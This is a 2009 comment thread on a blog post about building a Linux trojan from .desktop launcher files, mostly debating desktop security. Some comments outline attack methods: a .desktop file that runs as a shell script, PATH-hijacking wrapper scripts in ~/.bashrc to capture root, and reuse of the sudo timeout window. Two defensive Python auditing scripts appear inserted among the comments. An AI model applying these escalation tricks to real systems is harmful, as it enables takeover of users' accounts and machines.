I have strongly criticized the virus/malware/worms issue because actually a much bigger problem for desktop/laptop computers are "normal" bugs.

This hysteria is rather similar to this painfully boring "man-made global warming" issue. The only winners are those Nortons or F-Secures etc. who are leading this bandwagon. BTW I agree with the critics against "Windows-style" file managers and desktops. Now I understand why my teacher of C/C++ was so furiously against graphical "nice looking" desktops. Mouse-clicking "liberty" is just a pain in the ass.


Comment by Romanic, on 13-Feb-2009 00:25

An interesting article, thank you. 

"* Linux as the core OS is more secure"

Out of curiosity, what is your data or reasoning for that?

Architecturally, since NT, Windows seems to have had a good security model and MinWin seems to be a positive change. Other security measures seem to keep improving too. 

Since Vista, the much-maligned UAC has made running as standard user fine, even with all the poorly designed software out there which relies on administrator privileges.

"The hapless user double-clicks on the attachment, which Windows – in the absence of some decent anti-virus software – will obediently execute."

My mail app has prevented this for a long time. Now there's UAC too.

"Often, the published vulnerability list for Linux includes those of the many available or bundled apps, while those for Windows only include those of the core OS, that should also be taken into account."

For interest, here's a comparative OS security report that splits out the bundled apps to be equivalent to Windows.

-

Disclosure: It matters to some people, so I'll mention that I work for Microsoft in NZ. My opinions are still my own. I hope. :-)


Comment by g fernandes, on 13-Feb-2009 00:38

As pointed out in the LWN comments (http://lwn.net/Articles/318755/), the gksu hack won't work on Red Hat family systems.

Also, one must remember that at the end of the day, no amount of good engineering (in an OS, DE or any other software program) will do away with the danger of social engineering attacks.

Your "virus" effectively exploits PIBKAC, as do phishing attacks etc. The solution is not imprisoning the user's flexibility on a DE/OS. The solution is user-education.


Comment by Daniel, on 13-Feb-2009 01:47

Well, your method is far more overcomplicated imho.

It is much more simple to create a script (can be obfuscated enough to hide its real job), send as attachment and ask the user to run it even with root privileges. No need to mess with .desktop files.

"Against stupidity the gods themselves contend in vain."


Comment by alinuxuser, on 13-Feb-2009 02:33

I love that article! Here is my recipe for a virus:

1. Buy a 2 kg steel hammer and a box

2. Use the hammer to hit one of your fingers (your choice which one)

3. Put the hammer and the printout of my recipe into the box and send it to somebody.

4. IF the recipient is stupid enough to open the box, read the recipe and execute it we have the REAL LIFE VIRUS!

There is no way you can protect someone from shooting his own foot if he really wants to do it! Is it normal practice that you're saving/executing whatever comes to your email box?

--

www.pld-linux.org


Comment by Maxo, on 13-Feb-2009 03:08

I had already thought about this too. I don't see it as a big deal at all. The idea that a user can install software at a user level that can do what it wants within that user level is not a big deal and I would not want an OS that prevents that.

One thing you may not have thought about, at least I had not, is that the malware could use a keylogger to capture the password when a user tries to run something like Synaptic, and then it would have full root to do whatever it wanted.


Comment by Colin, on 13-Feb-2009 05:12

This is how Thunar does it:

http://www.google.com/codesearch/p?hl=en#06L7Y7xwnvI/Thunar-0.8.0/thunar-vfs/thunar-vfs-io-local.c&q=x-thunar%20suspected-malware

Looks whether the file tries to look like another mime type.


Comment by asr, on 13-Feb-2009 05:20

Hey

I found the way to turn the .desktop file into an executable shellscript by itself, thus you don't need to wget the script:

========= file test.desktop =============

Ignore= /tmp/x2 ; sh /tmp/x2'
Icon=x-office-document
Type=Application
EOF
# Anything from here is run as a regular shellscript
# by asr
echo 'PWNED!!!!!!' > /tmp/lol

===== end of test.desktop =========


Comment by asr, on 13-Feb-2009 21:08

My previous message has been garbled by some text filter :(

It should start with Ignore=<

and then a regular .desktop, plus EOF, then the shellscript


Comment by m0rebel, on 14-Feb-2009 15:16

Nice article! I saw you added an update saying you'd be surprised if you came up with these attacks on your own. I hadn't thought of the GNOME and KDE desktop launchers, but just a couple days ago when I started my own blog I posted about the changing-the-path-to-sudo trick here: http://blog.banditdefense.com/2009/02/06/sudo-install-my-rootkit/


Comment by Benjamin, on 14-Feb-2009 23:51

Thanks a lot for opening my eyes! I was like almost everybody: "I don't care about security in Linux, it's so safe... well, my foot!"

Can I translate your article for my French Linux blog please (in order to make French users aware of this)?

Anyway thanks a lot for this article !


Comment by Gnothi, on 15-Feb-2009 01:56

Why do FUD-meisters abandon common sense when talking about Linux?

Never download and run an untrusted file. PERIOD.

No friend, no law, and no OS can protect someone from their own stupidity. This so-called flaw resides between the keyboard and the chair (i.e. the end-user), not within the PC.

Next, foobar will write a glowing endorsement of the surveillance and censorship spyware (DRM) that's built into the Windows 7 kernel, which allows Microsoft to police whatever you're doing with your PC. Yeah, let Big Brother protect you from yourself!

;)


Comment by Gurgle, on 16-Feb-2009 02:56

Are we heading towards AV packages running on Linux then?

Would an updated AV help stop this 'file' getting onto your system in the first place (once the 'file' is known)?


Comment by Tutal Kaboo, on 16-Feb-2009 14:02

I thought a couple of things (that I do) helped prevent me from being susceptible to viruses.

1. I'm never logged in as root/administrator unless I want to do something specific that requires that privilege

2. I'm not part of the Administrators group on Windows and I'm not in sudoers on Linux

But, your article points out that my machine need not be infected, it is sufficient if my account is infected.

Great article!


Comment by Dutra de Lacerda, on 18-Feb-2009 09:01

The 1st OS I have used, was a UNIX version in a MultiUser environment.

I built a viral script to get control over my mates' resources. The main reason was to keep them from doing that to me. Never really used it to profit from time-share.

This was in 1993. And I never exploited other possibilities, nor evolved it after that, as the purpose was just to be defensive, and just for a small period of time.

I've moved to DOS in PCs. Much faster environment, even with the old 8086 CPUs.

This just proves the point.

And reminds us there's NO secure system, if it has flaws (built-in or in the configuration).

Assuming security because the alternatives are known as insecure, is an invitation to serious problems in future (unawareness is NOT safety, just a pleasant state in illusion)


Comment by ethana2, on 18-Feb-2009 09:21

I have a ~/.bashrc packed full of handy quick system administration commands.

..I chown'ed it root.

....it should ALWAYS be owned by root; that's a dangerous file for the user to own.


Comment by manuel, on 18-Feb-2009 09:29

Wouldn't setting the attributes "noexec, nosuid" on the /tmp and "/home" partitions help to circumvent the issue?

If so, it could become the default behaviour of most Linux distro's installers.

As far as I'm concerned, I set those on the "/home" partition for I consider a regular user doesn't have to execute things/apps/scripts from its own "/home" folder!

I did this for my wife's computer as she is unaware of the potential risks... worse, she doesn't want to know... for her the computer must just work and the rest is none of her concerns...

Now that I've read your excellent article, I'll also protect the "/tmp" partition.

Thanks for the brilliant demonstration!

Cheers,

Manuel


Comment by Anonym, on 18-Feb-2009 10:14

OMG... "How to write a Linux virus" and then you are talking about _desktop environments_ not about the Linux operating system!

The Linux kernel is THE operating system. Nothing else belongs to the operating system than the Linux kernel itself. If you want to write malware for the operating system, it should infect the Linux kernel, which is the operating system.

But I give you a way to escape by assuming that you meant "How to write a virus in 5 easy steps that can be run by Linux, SunOS, FreeBSD and many other Unix/*nix operating systems".

The most important, and the only important thing is that this is about GNOME and KDE functionality to run .desktop files. Not about the Linux operating system running those, because the OS still just executes all the code that the other software asks it to.

Do not spread the political and marketing propaganda about "Linux" or "Linux operating system" being more than the monolith kernel itself. That is very stupid and lame.


Author's note by foobar, on 18-Feb-2009 11:02

@Anonym: Did you even read the article? Probably not very thoroughly. Firstly, I am stating there very clearly that I am talking about Gnome and KDE vulnerabilities. Secondly, if you look at what commonly is called 'Linux virus/worm' or 'Unix virus/worm' (go ahead, google it!) you will find that most (all?) of them are exploiting a vulnerability in a server process or some other program that is run on top of the OS. Yet, they are called a 'Linux worm/virus' or 'Unix worm/virus' because it impacts systems with those OSs (which run those apps, of course).

So, next time please stop and think for a second before you start typing...


Comment by Matthew C. Tedder, on 18-Feb-2009 13:05

Here's one of your bugs: Between the "curl" and "python" commands, you'll need "&&" and not just ";"..

This isn't exactly a big insight--I'm sure just about anyone who has pondered writing malware for Linux has gone down this lane. It's obvious.

The main problem with it (besides your own bugs): With each step or pre-requisite tool, you lose exponentially more possible targets. You'd be very lucky to get one person infected out of any user's email list.

(1) How many people will download onto the desktop and click on the link..

(2) How many people have curl installed..

(3) How many people have python installed..

(4) How many people are using a mail client that uses the mailbox standard for reading in the address book?

Automatically installing the pre-requisites would require sudo (hence root privileges).

I think it is a good idea that the standard for desktop links between KDE and GNOME also require to be executable... But even without, you cannot realistically expect any growth in the spread of your trojan.

You might fool a buddy or two... someone who knows and trusts you.

Matthew


Author's note by foobar, on 18-Feb-2009 13:17

@Matthew C. Tedder: Sorry Matthew, but you are mistaken. Several times.

1. No, I don't need a '&&'. I don't know which shell you are trying or what exactly you have typed in, but this works exactly as I wrote it for me and it does so on several standard installs (Ubuntu, Kubuntu and Fedora).

2. Who has curl or wget installed? Most distros. At least those that matter as far as market share is concerned: Ubuntu, Kubuntu, Fedora. I'm sure SuSE has something like it as well.

3. Who has Python installed? Again, almost everyone. I don't know which distro you are running, but all those that I have checked do. And my goodness: Does the term 'proof of concept' mean anything to you? Use bash programming if you like that better. I'm sure that's installed everywhere.

4. Huh? I don't even know what you are talking about. But I do know that I can write a single shell line, which reliably extracts all email addresses that I have ever contacted from my mailbox. I don't need the address book if I don't want to. And I can just run that single line against ~/.evolution, ~/.mozilla-thunderbird and some of the other common places in which one finds emails.

As outlined above, in the very most cases I don't need to install any prerequisites, thus, I don't need root.


Comment by Toxic_Shock, on 18-Feb-2009 14:00

I guess it is time to reform the desktop environment...

1) Remove the heavy integration from the desktop environment. It violates the Unix philosophy of 'one program per task' spiel. I agree, leave the double click and your problems are solved for windows users.

2) More advanced policies on execution. Like SELinux and Apparmor, something should be running that prevents programs from messing with directories they have no business in. If those policies are too hard to maintain, then maybe linux isn't for you. However, since programs can do so much, they would naturally have more directory access.

I'd hate to see a world where Linux users are running virus scans and spyware scans.

If the current desktop projects refuse to consider this, they should be abandoned by security aware users in search of, or in a quest to create, a desktop environment with all the security considerations in mind.

Ease of Use often destroys security.


Comment by Nacho, on 18-Feb-2009 14:25

Interesting article, no matter what a few guys want to discuss ;-)

But please... change the CSS for printing. I wanted to keep it for online reading, and the main article (with no comments) took over 22 pages! ;-)


Comment by tantris, on 18-Feb-2009 16:00

"Truly, on a desktop system that is normally just used by a single user owning that user account is pretty much equivalent to owning root, as far as doing damage is concerned"

Exactly. And that has been bothering me for quite a while. What one usually reads is the mantra about not being able to take over the system, only user accounts, very safe, blala...

That's fine for a multi user system, but for a desktop system I don't care that much about the OS (I got a clean copy on CD), nor downtime, but my files in userland.

With more and more people using Linux and more and more programs using scripts, the risk will increase. It doesn't have to be a desktop icon, it could also be a malware script for Firefox (the cool new toolbar), some runaway Java that exploits a bug, an addon for Evolution, ...

Maybe web applications shouldn't run as user at all. No desktop user rights, no script problems.

They could be in my group, so I can read the files, but have no write access outside of their subfolder.


Comment by Shane Spencer, on 18-Feb-2009 17:21

Rinse/wash/repeat for any other OS. How is this news?


Comment by Dave, on 18-Feb-2009 20:39

Interesting points. Definitely a flaw in the FreeDesktop spec, if you ask me... And the immediate fix response I have is the same as yours -- require .desktop files to be executable. I don't think that's a bad idea at all. The only problem is that a .desktop file would then need a hash-bang or it will be interpreted by /bin/sh. Minor, but it means having to tweak every .desktop file out there.

Also, the problem of gaining root is simplified by a smart app which waits until some other app requiring root has been launched with gksudo (as is update-manager, for instance). The idea behind sudo (and gksudo) is that if you've authenticated, you shouldn't need to re-auth for a period of time after the last time you needed to. So if you perform a gksudo-based operation every 5 minutes, you will only have to auth the first time (default window is 15 min, iirc). A smart py app could wait until one of these more well-known apps is running before attempting its nefarious actions via a quiet sudo.


Comment by Azrael, on 18-Feb-2009 22:48

synaptics != synaptic.

Synaptics is a touchpad driver, Synaptic is a GUI deb package manager.


Comment by Daniel, on 19-Feb-2009 00:52

Whew, for a moment I thought this was actually going to be something to worry about. No operating system can be hardened against social engineering. When you come up with a way to infect my Linux system with no interaction on my part... then I'll start to worry.


Comment by Jamster, on 19-Feb-2009 01:27

Thanks for this informative article!

It's sad that so many people start falling back into bite reflexes as soon as they see an article that might even remotely criticize something about any part of Linux software or users. It's also funny that 90% of them show that they haven't even fully read the article, while waving around their 'Durr, you're so stupid but you can prevent it via X Y and Z!' Congrats. You're not who this article is about. But you'd have known that, had you properly read it.

Alas though, I'm not here to fuel flames, but to praise; the notion of getting root access through modifying the user-editable menu-entry files for su/sudo-requiring apps is brilliant. I mean, it's utterly simple, but it's just nothing most people -think- of. Usually when talking about getting root, one thinks of privilege escalation exploits in the kernel, but that's it.

And while the old rule of not wildly opening e-mail attachments is ancient and old news by itself, I'm glad you stated the fact that, yes, Linux users also need to live by it.

One big reason:

While on the one hand, most Linux users are tech-savvy and security-aware... people seem to forget that those users also often -eagerly- try to push the benefits of Linux onto their family members and friends. 'Hey, this is a lot more secure than your Windows, use it! I'll install it for you, too!'

Boom. There you have it. Linux users who are not in the least the OS experts and security-aware folks that many people claim a Linux user clearly is. And we'll be seeing more of this in the future. That's something to think about folks... Mr. LinuxExpert installing fave-distro for others as a gift. You know, because their Windows was so worm-ridden ever so often.


Thanks for the article.


Comment by hazed, on 19-Feb-2009 03:16

Dammit, thanks for taking away one of my leading arguments when getting windows users to migrate to Linux!

Nevertheless, it was very informative, and definitely something to keep in mind when dealing with GUI's of any sort, on any sort of operating system.


Comment by Alex Borges, on 19-Feb-2009 06:00

K man, all you say is true.

But come on:

1) Wanna get rid of your "virus"? Delete all dot-files in the home directory, recreate from /etc/skel.

2) Did the "box" get infected? No, it didn't, only the home directory of the user did.

3) Do you need an antivirus to protect or remove the thing? No, all you need is a little technical prowess.

4) No operating system experience can survive the user tendency to execute something that arrives randomly in their inbox. None at all. Or well, only those that do not let you execute anything except verified and signed code, such as the iPhone and other cellphones. While we may enjoy this lack of feature in a phone, no PC would be worth it if you couldn't use it as a generic platform.

5) It all depends.... on the visual file manager's configuration. Mine won't run anything without asking me if I want to look at a terminal screen or not. That's two times it asked: once in my email client, once when attempting to run.

So yes, you can make a trojan for Linux (for anything, really, even a pwned iPhone). It's just cheaper to kill and it's harder for it to infect you.

On the other side, no Linux user should feel comfortable with a script arriving at his/her box. Linux gets its software from a recognized distributor, not from any kind of email. Linux users so tend to be much more wary of anything that will attempt to run on their box, since anything that has to "run" comes from a little icon on the top left, for most distros.

You are right, though, in that nobody should say that Linux is impervious. It is not. It's just MUCH MUCH MUCH more secure.


Comment by martinob, on 19-Feb-2009 06:50

Hi,

This is an interesting article. It reminds me of an Ubuntu thread I read a couple of years ago about a hypothetical fake-sudo exploit.

http://ubuntuforums.org/showthread.php?t=504740

How about the following suggestions for users:

1) Never open anything by left-clicking on it; always do it by right-clicking and selecting action from the context menu.

2) To avoid privilege escalation: don't use su or sudo from the same virtual terminal as your regular user. In my case, I've configured my system so that two X sessions are opened by default. One of them (under F7) is for my regular user, and the other one (under F8) is for a privileged user, from where I use sudo or su for programs like synaptic. I use a lightweight WM (IceWM) for this privileged account, so that the system is not so loaded. In other words, I work under the assumption (I think it's correct) that virtual terminals are a hard wall against all forms of keylogging. Why bother? Well, for instance, you may have a hard-disk backup policy in which backups can only be deleted by root. So, if the trojan only gets your user account, it can delete your working files but not your backups.

Now, for DE developers:

Always give the user visual cues as to whether a file is to be opened with a low-risk application (like gimp, firefox or openoffice) or a high-risk program like an interpreter (bash, perl, python, ...). Here the risk criterion is as follows: "is it normal, expected behavior that opening a file with this program may result in arbitrary manipulation of other files by the program?" If the answer is affirmative, the program is an interpreter, and the file icon should reflect this fact (either by only allowing one or a few, easily recognisable icons for this type of file, or by surrounding the icon with an indicator halo, or something like that), or the DE should prompt the user for confirmation upon left-clicking. Yes, openoffice (with macros) and firefox (with javascript) are becoming a grey area, where some files are not as safe as they should be, but this risk is properly assessed and addressed by developers of those programs. In contrast, general-purpose interpreters are meant to execute code without restrictions. The long-term solution would be, I think, a capability-based security model... but in the meantime, this rough distinction between interpreters and everything else should remain a priority.


Comment by Tempura, on 19-Feb-2009 21:34

Besides dumping desktop files in ~/.local/share/applications, there is a more useful way to gain root access. Just modify $PATH in ~/.bashrc and dump some wrapper scripts for the usual apps somewhere. This way, there's nearly a 100% chance that you gain root access the next time the user uses root. This works because most of the desktop files don't use the full path to applications. And neither does the user.
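The PATH shadowing Tempura describes is easy to check for from the defender's side. The following is an added example (not code from the blog or from any commenter) that audits a PATH value for user-controlled directories searched ahead of the system directories, and scans a shell rc file for assignments that prepend to or replace $PATH. The sample `.bashrc` text and the home directory `/home/alice` are constructed for the demonstration; the set of system directories is an assumption that matches common distributions.

```python
import os
import re
import tempfile

# Directories a distribution normally reserves for system commands (assumption).
SYSTEM_DIRS = {"/usr/local/sbin", "/usr/local/bin", "/usr/sbin", "/usr/bin", "/sbin", "/bin"}

# Matches `PATH=...` or `export PATH=...` at the start of a shell rc line.
PATH_ASSIGN = re.compile(r'^\s*(?:export\s+)?PATH=(?P<value>.+?)\s*$')


def audit_path(path_value, home):
    """Return (entry, reason) pairs for PATH entries that let code running as
    the user shadow system commands such as sudo or su.

    Only entries searched before the first system directory can shadow a
    system command, so everything after that point is ignored."""
    findings = []
    home = os.path.normpath(home)
    seen_system = False
    for entry in path_value.split(":"):
        if entry in ("", "."):
            findings.append((entry, "current directory is searched for commands"))
            continue
        if not os.path.isabs(entry):
            findings.append((entry, "relative directory is searched for commands"))
            continue
        norm = os.path.normpath(entry)
        if norm in SYSTEM_DIRS:
            seen_system = True
            continue
        if seen_system:
            continue
        if norm == home or norm.startswith(home + "/"):
            findings.append((entry, "directory under $HOME is searched before system directories"))
        elif os.path.isdir(norm) and os.access(norm, os.W_OK):
            findings.append((entry, "user-writable directory is searched before system directories"))
    return findings


def path_prepends(rc_text):
    """Return (line_number, line) for rc-file assignments that put new
    directories ahead of the existing $PATH, or replace $PATH outright."""
    hits = []
    for number, line in enumerate(rc_text.splitlines(), 1):
        match = PATH_ASSIGN.match(line)
        if match is None:
            continue
        value = match.group("value").strip("\"'")
        if not value.startswith(("$PATH", "${PATH}")):
            hits.append((number, line.strip()))
    return hits


if __name__ == "__main__":
    # Constructed sample rc file; the second line is the pattern to look for.
    SAMPLE_BASHRC = (
        'export PATH="$PATH:/opt/tools/bin"\n'
        'PATH=$HOME/.hidden/bin:$PATH\n'
        '# alias ll="ls -l"\n'
    )
    for number, line in path_prepends(SAMPLE_BASHRC):
        print("bashrc line %d puts new directories ahead of PATH: %s" % (number, line))
    with tempfile.TemporaryDirectory() as tmp:
        for entry, reason in audit_path(tmp + ":/usr/bin:/bin", "/home/alice"):
            print("PATH entry %s: %s" % (entry, reason))
    # Finally look at the real environment of whoever runs this.
    for entry, reason in audit_path(os.environ.get("PATH", ""), os.path.expanduser("~")):
        print("live PATH entry %s: %s" % (entry, reason))
```

Note that a finding is a risk indicator, not proof of tampering: Debian-style `~/.profile` files add `$HOME/bin` and `$HOME/.local/bin` in front of PATH by default, which is exactly why a dropped wrapper there is reached before `/usr/bin`. What matters for the defender is that the privileged user's shell (and any sudo session that keeps the caller's PATH) resolves `sudo`, `su` and friends by absolute path, or that these directories are kept out of the privileged user's PATH.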


Comment by themouse, on 20-Feb-2009 03:21

I tell everyone that viruses/trojans are unlikely on Linux. And what I tell them is that the individuals who have the skill in that environment are usually writing kernel or some other code.

Windows on the other hand is a closed door, red button who can resist...


Comment by Scali, on 20-Feb-2009 04:13

Hi, I liked your article, but there is a small error in there.

Windows actually DOES have an execute bit in the filesystem. At least, it does on NTFS partitions.

You have the following basic permissions:

- Full Control
- Modify
- Read & Execute
- Read
- Write


All these are ACL-driven and as such can be inherited and you can set allow/deny rights for any group or person you like.

This makes it possible to have .exe files that can be read and written to by a user, but not executed, just like on a *nix system.

The main problem here is that on most Windows systems, the execute right is enabled at the root of the drive, and then automatically inherited, which will still allow people to run executables.

This is however the result of a system that is not properly configured by the administrator, and not a deficit of the OS itself, as the article claims.


Comment by Hilzu, on 24-Feb-2009 11:21

Interesting. According to this: http://commit-digest.org/issues/2009-02-08/ the problem described here is actually being fixed in KDE and Gnome.


Comment by erikro, on 26-Feb-2009 03:43

Hi,

that's amusing. I've been using Linux now for more than 10 years, and from time to time I read that viruses are as possible under that system as under Windows. I just googled around a bit for another of those discussions to have a look at what's going on at the moment. Business as usual. We hear two mantras. The Linux mantra of the stupid people who tell us that Linux is not vulnerable, and the paid-by-MS mantra that it is as vulnerable as Windows and we don't have viruses here because it isn't used as much as Windows. Both are wrong.

First of all, the argument that viruses are not found under Linux because it is not as widespread as Windows isn't an argument. This is true when we are talking about desktop systems, but what about server installations, which are much more interesting for crackers than my grandma's computer? Here we find many more installations under Linux and other Unixes than Windows. Where is the malware found?

Second, for about ten years now the MS-paid people have been telling me that soon we will find a load of Linux viruses. I'm waiting and waiting and nothing happens. The viruses we know are not spread. Only some laboratory viruses exist. For example, in 2006 Kaspersky, who is for sure one of the world's leading virus experts, told us so. Now, three years later, he repeats it. How many new viruses were found widespread in the wild in the last three years? Under Windows nearly uncountable, under Linux none. So what?

Third, everyone who really knows the system architecture of both systems also knows that Windows is much more vulnerable than Linux. Not only the concept of making files executable not by their name but by an executable bit, not only the user concept, but also the concept of how hardware drivers can be added makes Linux harder than Windows. That doesn't mean that Linux can't be attacked. One who says so is just stupid. It's just not that easy and we need other methods to do so.

The easiest method is, and that's what you are talking about, the social attack. Why look around for an exploit if I can tell the user to execute the file? In that case the user concept protects the system from the worst case, giving the attacker root access. Is it so? Is Linux really better in that case? No it isn't, and that's the point of your article.

I'm also running Windows, even for a longer time than Linux. I never installed a virus scanner. I have my virus scanner placed in my brain. Ok, that's not the way everyone should act, and in the last years I've been using Windows only for testing and educational purposes and not for surfing, email... The most important point is that I know how to make Windows as rock hard in that respect as Linux. It is possible, even though it costs you a lot of work. The lack in the user concept of Windows is not the architecture but how it is used. We all know that the first user made during the installation process has full admin rights, and people are not even told that this is dangerous. So the non-technical users don't even know which risk they are running and what to do against it. In the home editions they don't even have the chance to make the change. That's what makes Windows installations that vulnerable.

Is Linux better than this? Let's take a look at the current distributions. I'm not only administrating systems but also teaching how to do so. Doing so, you have a much closer view of what is strange. So, I installed the newest openSUSE with my pupils. I was a bit shocked when we created the first user:

- user password the same as root password: activated
- user logged in automatically: activated

Hey, that's like Windows! For sure I told my pupils to deactivate this, but will new non-technical users who downloaded openSUSE to give it a try do so? They don't under Windows and they won't under Linux. So they will have a great lack of security which is not needed.

Other distros, I've been told (I think it was a fork of Ubuntu), use only sudo to give users root access. Sudo is a nice thing for server administration, to let the email admin configure only email stuff, the web admin only Apache etc., but for desktop systems it is not really needed. It's only easier for the user: not always giving the root password but just typing sudo. I was told that there are distros which don't even have a root password, but everything has to be done with sudo, even without being prompted for a password. So we can use your method to run everything we want with root rights on those systems.

That's what's going on. The modern distros want to make Linux as "easy" as Windows seems to be. That's the wrong way. Linux, in my point of view, was always easier to handle than Windows because the basic installation was as secure as the system could be. Windows is a system on which you have to work a lot to make it secure. So the way should be to keep Linux secure and not to make the same mistakes as MS did.

Bye

Erik


Comment by Madman, on 27-Feb-2009 02:11

@Romanic: Yeah, good thing Microsoft is working hard to make UAC more secure...

Part of the reason GNU/Linux is so secure is because of the repository system. Need an application for a specific task? Search the repositories. 99.9% of the time, your wanted application is there. No need to surf the web, scan downloaded executables with a virus scanner, download programs from e-mails, etc. etc. etc.

Granted, as said quite a few times, social security isn't an issue that GNU/Linux can fix. Leave that to education. As was also said before, albeit only once, a fix is being made in both Gnome and KDE.


Comment by passerby, on 28-Feb-2009 04:48

It's a very valid point that root privileges are not needed, considering that most malware and spyware is meant to harvest people's personal information, which can all be accessed from a user-level account on a Unix machine. The internals of the operating system that are protected by root privileges I don't consider to be overly important, because if they are compromised I can just do a fresh install of the operating system. The data I actually care about on my computer is all contained within the home partition, within my user folder, which can all be accessed by this hack or whatever you want to call it.


Comment by ShadowCat8, on 13-Mar-2009 12:37

"Virus", "Trojan Horse", "Worm" and "Malware"...

The media, which is where your average end-user gets their education about computers, has been using these terms almost completely interchangeably for nearly as long as there have been consumer-level computers available. Very similar to the way that the term "Hacker" went from its original definition of "a person who takes someone else's code and changes it to suit their needs" to "someone who tries to bypass the 'front-door' security of a remote system."

Another way to put it might be; "Do you use a PC?"

Well, if you don't have Windoze loaded on it, Micro$loth would have you believe, "No! If it hasn't got our software on it, it's not a PC!" which is complete bull! "PC" stands for Personal Computer and has nothing to do with the OS that is loaded on it (unless you talk to my mother, who has believed that 'PC' stands for 'Profusely Corded' since she first saw my C64 back in the day). But, the media plays along and the commercials run, and now you have 6- and 9-year-olds claiming to be PCs. Ugh! And, the irony completely escapes those people when they see the motto "Life without walls..." and don't realize, "Hey! If I don't have walls, I don't need windows!"

@our host, foobar + erikro

You are correct; Since we are seeing an increase in the end-users that are migrating away from windoze to other OSes, the possibilities of creating security issues within "secure OSes" increases. It falls upon us, the ones who have actually been working in the field and on the code for years, to teach and train them what proper safe computing practices are. And, while the basic concept of "If you don't know who sent you that email with the attachment on it, delete it!" is so obvious to us as to be redundant, keep in mind that to your average end-user, it isn't. Remember that M$ always coded to "the lowest common denominator" and made it easy for *that* user to be able to do what they had to do, despite the security risks. However, if they hadn't done that in the first place, computers in general would not be as widespread as they are now. (The proverbial double-edged sword.)

So, as our friends and family are moving into different OSes like Linux, OS X, etc. it behooves us to teach them how to protect themselves and their systems from those who would do harm. Either spend the 20 minutes with them when they get the new email client installed on how to properly configure it and use it, or spend an entire evening until one in the morning trying to rescue their data after they *did* click on that dangerous attachment when it finally does come. Undoing the dangerous paradigms that M$ has established in the end-users' heads with regards to what is considered "good computing" would go a lot further towards system security than having the best AV program loaded on the system, imho. And, to that end, I applaud foobar for putting this and the follow-up posts online!

@EvilPixieMan, et al.

If you are one of those who have an issue with the current usage of the malware terminology, then perhaps it is time to do something about it. If you see a news story incorrectly calling a piece of malware a virus and you know for a fact that it is a worm, correct them. Good journalists really are concerned about accuracy, and will generally print a correction.

Of course, there are those journalists who are only concerned about ratings/readership/$$$/etc.. The only way to change them is to ignore them. If a news service keeps calling a particular trojan a virus, even after correction, then it's time to stop watching/listening/buying from them. The only thing they are looking at is the bottom line, and that is where we have to convince them that it is a bad idea to stretch the truth for their ratings.


Comment by Zwopper, on 29-Mar-2009 01:47

Interesting article, yet another reason to be glad about using XFCE, LXDE and a slew of others! :)


Comment by Niun, on 29-Mar-2009 07:44

hi,

what about mounting the home partition (and the /tmp dir) with the noexec option?

A developer or someone who wants to run scripts without root rights (call him scriptguy) would have to create a directory outside the home partition (with root rights) where only scriptguy has write permissions.

This way a normal user is not able to run downloaded code. If he knows the root password and knows how to set up the script directory, he is hopefully too smart to click on these faked office documents.
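Whether `noexec` is actually in effect for the places a mail client or browser writes to is something worth verifying rather than assuming. The following is an added example (not code from the blog or from Niun) that parses `/proc/mounts`-style lines, finds the mount that covers a given path, and reports whether the kernel would honour execute bits there. The sample mount table is constructed for the demonstration; when run as a script it also reads the real `/proc/mounts` if it exists.

```python
import os

# Constructed sample in /proc/mounts format: /home and /dev/shm are noexec, /tmp is not.
SAMPLE_MOUNTS = """\
/dev/sda1 / ext4 rw,relatime,errors=remount-ro 0 0
/dev/sda2 /home ext4 rw,nosuid,nodev,noexec,relatime 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,relatime 0 0
tmpfs /dev/shm tmpfs rw,nosuid,nodev,noexec 0 0
"""


def parse_mounts(text):
    """Parse /proc/mounts lines (device mountpoint fstype options ...) into
    a {mountpoint: set(options)} mapping."""
    mounts = {}
    for line in text.splitlines():
        fields = line.split()
        if len(fields) < 4:
            continue
        mountpoint, options = fields[1], fields[3]
        mountpoint = mountpoint.replace("\\040", " ")  # /proc/mounts escapes spaces as \040
        mounts[mountpoint] = set(options.split(","))
    return mounts


def mount_for(mounts, path):
    """Longest mountpoint containing path, matched on path boundaries only
    (so /home does not cover /homework)."""
    best = "/"
    for mountpoint in mounts:
        if path == mountpoint or path.startswith(mountpoint.rstrip("/") + "/"):
            if len(mountpoint) > len(best):
                best = mountpoint
    return best


def exec_allowed(mounts, path):
    """True if files under path can be executed directly (no noexec on their mount)."""
    return "noexec" not in mounts.get(mount_for(mounts, path), set())


def report(mounts, areas=("/home", "/tmp", "/var/tmp", "/dev/shm")):
    """Map each user-writable area to whether direct execution is still allowed there."""
    return {area: exec_allowed(mounts, area) for area in areas}


if __name__ == "__main__":
    print("sample table:", report(parse_mounts(SAMPLE_MOUNTS)))
    if os.path.exists("/proc/mounts"):
        with open("/proc/mounts") as handle:
            print("this machine:", report(parse_mounts(handle.read())))
```

The caveat a practitioner should keep in mind: `noexec` only stops the kernel from executing files on that filesystem directly (`./script.sh`, a downloaded binary). It does nothing against `bash script.sh` or `python script.py`, because the interpreter merely reads the file, and the `.desktop` launcher the article describes invokes an interpreter through its `Exec=` line. So `noexec` on `/home` raises the bar for dropped binaries but is not a defence against the launcher trick on its own.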


Comment by Tony, on 7-Apr-2009 20:19

That would sound suspicious to most of us, but 'most' is not 'all' and user stupidity is everywhere.

Great little article, but I take exception to the above statement.

Some, including myself, might not be computer literate or have had the opportunities to be so... uneducated might have been a better word coming from someone like your good educated self.

I will leave you on my farm for a season and if you go broke because you haven't done it before I won't call you stupid now, would I?


Author's note by foobar, on 8-Apr-2009 06:59

@Tony: Thank you for your comment. I accept your point about 'user stupidity'. The phrasing there is not the best one. As a matter of fact, I very much agree with your sentiment. You might want to take a look at these two articles here, which I wrote about just that subject a few months ago, here and here. Calling users stupid for making mistakes like that is counterproductive and doesn't help anyone.

If you look at the virus article, you find that four paragraphs above the place from where you quoted, I wrote:

    However, there is nothing fundamental about the architecture of
    Linux that prevents user stupidity or ignorance, which is of course
    the main ingredient in any attack vector like this.


I talk about 'stupidity' (for example, ignoring warning messages after being warned or educated about it) and 'ignorance' (just not knowing any better). These two things are of course different.

The latter ('ignorance') can happen to all of us. The word is often laden with a very negative image, but it is quite clear that most of us are ignorant about most things around us. I know that: See my two articles to which I linked above.

In the paragraph from which you quoted I condensed it down to a compact phrase in order to make the point succinctly. I should have been more careful and added the word 'ignorance' back in there.

P.S. No need to risk your farm in my hands, I know ahead of time that I wouldn't do very well there... :-)


Comment by Tony, on 8-Apr-2009 09:08

Thank you for your awesome reply... Your two articles cleared the air for me... thanks, and btw I really am impressed with your computer knowledge; that's why I read your stuff.


Comment by Steve Hanov, on 12-Apr-2009 13:50

